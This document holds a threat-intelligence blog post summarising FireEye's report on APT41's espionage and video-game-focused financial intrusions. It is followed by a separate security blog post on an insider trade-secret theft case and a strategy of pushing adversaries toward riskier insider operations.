    APT41: A Dual Espionage and Cyber Crime Operation

    Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

    The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

    Who Does APT41 Target?

    Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

    The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

    Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

    A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

     


    Figure 1: Timeline of industries directly targeted by APT41

    Probable Chinese Espionage Contractors

    Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

    Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


    Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

    The Right Tool for the Job

    APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

    APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

    Fast and Relentless

    APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

    The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

    Looking Ahead

    APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

    Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

    APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

    Read the report today to learn more.

    Forcing the Adversary to Pursue Insider Theft

    Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

    Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

    This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

    When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

    We sought to make digital intrusions more expensive than physical intrusions.

    In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

    In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

    This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

    The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

    Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

    Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

    Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

    In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.